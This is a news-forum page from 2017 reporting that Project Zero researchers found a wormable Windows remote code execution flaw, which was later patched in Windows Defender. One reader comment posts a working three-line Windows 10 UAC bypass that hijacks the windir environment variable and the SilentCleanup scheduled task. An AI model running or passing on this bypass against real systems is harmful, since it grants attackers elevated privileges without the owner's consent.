Stories
Slash Boxes
Comments

SoylentNews is people

posted by on Tuesday May 16 2017, @02:24AM   Printer-friendly
from the been-a-tough-month-for-windows dept.

Google Project Zero researchers Tavis Ormandy and Natalie Silvanovich claim to have found a critical vulnerability in Windows. The details of the flaw will likely be disclosed in 90 days from now even if a patch is not available.

Ormandy announced over the weekend on Twitter that he and Silvanovich had discovered "the worst Windows remote code exec [vulnerability] in recent memory."

The expert has not shared any details, but he has clarified that the exploit they created works against default Windows installations, and the attacker does not need to be on the same local area network as the victim. He also said the attack is "wormable."

[Ed - According to ghacks.net and ArsTechnica the vulnerability was in Windows Defender and has been patched by Microsoft - fnord]


Original Submission

 
This discussion has been archived. No new comments can be posted.
Display Options Threshold/Breakthrough Mark All as Read Mark All as Unread
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.
  • (Score: 3, Interesting) by TheB on Tuesday May 16 2017, @08:35PM

    by TheB (1538) on Tuesday May 16 2017, @08:35PM (#510737)

    Yep, that bug is so last week.

    Here is today's windows bug.

    set a=hkcu\Environment /v windir /
    reg add %a%d "cmd /K reg delete %a%f||"
    schtasks/Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

    Uses Windows Task Scheduler to bypass UAC on Win10
    https://tyranidslair.blogspot.co.uk/2017/05/exploiting-environment-variables-in.html [blogspot.co.uk]

    Starting Score:    1  point
    Moderation   +1  
       Interesting=1, Total=1
    Extra 'Interesting' Modifier   0  
    Karma-Bonus Modifier   +1  

    Total Score:   3